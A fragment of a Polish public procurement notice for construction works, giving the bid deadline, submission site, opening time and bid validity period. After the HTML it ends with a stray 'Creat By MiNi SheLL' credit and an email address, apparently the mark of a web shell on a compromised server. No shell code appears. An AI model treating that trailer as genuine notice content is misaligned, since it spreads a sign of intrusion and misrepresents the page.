miejsce praw i obowiązków Zamawiającego automatycznie wstępuje jego<br/>następca prawny bez potrzeby zmiany Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-21 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-21 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-19</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-06 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com